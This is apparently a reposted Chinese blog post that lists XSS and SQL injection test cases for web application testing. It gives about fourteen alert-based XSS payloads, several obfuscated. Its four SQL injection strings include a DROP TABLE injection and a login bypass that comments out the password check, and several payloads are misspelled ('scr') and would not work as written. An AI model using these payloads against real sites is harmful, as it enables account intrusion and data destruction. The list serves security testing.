xssSQL测试用例小结

Posted cindy04

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了xssSQL测试用例小结相关的知识,希望对你有一定的参考价值。

xss测试用例小结:

<script>alert("跨站")</script> (最常用)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
<img scr="#" οnerrοr=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */οnerrοr=alert(/xss/) width=150></img> (/**/ 表示注释)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert(‘xss‘))}</style>
<div style={left:expression (alert(‘xss‘))}></div>
<div style={left:exp/* */ression (alert(‘xss‘))}></div>
<div style={left:065078ression (alert(‘xss‘))}></div>
html 实体 <div style={left:&#x0065;xpression (alert(‘xss‘))}></div>
unicode <div style="{left:expRessioN (alert(‘xss‘))}">[/post]

SQL测试用例小结

1 删除表:Select * from A where A.a = ‘testdata’; drop table A---’;

2 获取所有记录:

Select * from A where A.a = ‘testdata’ OR ‘1’=’1’;

3 不输入密码:

Select * from user A where A.username =  ‘username’--’ and A.password = ‘’;

4 使用半个单引号、分号

Update table A set A.a = ‘testdata’;--’

 

查询重复名称

select InnerCode from tbInfoEmployee where EmpName in(select EmpName from tbInfoEmployee group by EmpName having COUNT(empName)>1)

以上是关于xssSQL测试用例小结的主要内容,如果未能解决你的问题,请参考以下文章

实验三+158+余超勇

实验三+126+黄晟

实验三+063+陈彧

实验三+124+高小娟

实验三+162+张倩

实验三+074+林盼皇